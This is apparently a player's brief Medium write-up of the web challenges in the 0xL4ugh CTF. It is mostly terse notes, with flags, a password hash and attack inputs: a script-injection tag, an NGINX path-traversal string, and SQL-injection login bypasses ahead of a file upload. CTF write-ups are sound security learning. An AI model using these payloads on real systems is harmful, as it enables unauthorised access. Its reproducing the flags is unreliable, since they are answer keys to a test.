0xL4ughCTF-write-up

Let’s go solving the web challenge

1- Challenge Name : cake

cyber chef
cyber chef

2 - Challenge Name : sad_agent

burp-suite
cyber chef

3 - Challenge Name : Easy_Blog

user and pass = admin
anything to test
<script>document.getElementById(‘main’).setAttribute(‘id’,’flagHunt’);</script>
Flag:0xL4ugh{N0_Syst3m_1s_S@f3_3v3n_Y0u}

4 - Challenge Name : Cats

/flag.txt
nginx/1.19.6
Path traversal misconfigured NGINX
cats../flag.txt

5 - Challenge Name : Embedding

Bad Character Detected or you Break The Limit

6 - Challenge Name : Dark Login

<! — LnR4dA==→ base64 as .txt
/flag.php
curl -X POST 40.112.217.104/Dark Login/flag.php
user
pass
:)(:
Try To Access Element main An Inject HTML On It
see the console
796f754e6f774d650a.php
403 Forbidden
I Also Like The Parameters Specially If Its Value Was false
Your Password Is :- dac64421e6d507ef3817b661943ad3b3

7 - Challenge Name : Evil Panel

note > It's a Real Example Challenge , Try to use your brain to get the admin panel note : automated tools won’t help you

0xl4ugh Team
http://40.70.205.250/Evil_Panel/images/
/evil_admin.php
Your Entered Username/Password do not match with our database so please enter Right info…
‘ or 1=1;
Fatal error:
‘ or ‘1’=’1;
Welcome Admin ….
Upload your File

End the web challenge…… I solve it :)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Magdy

Ahmed Magdy

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher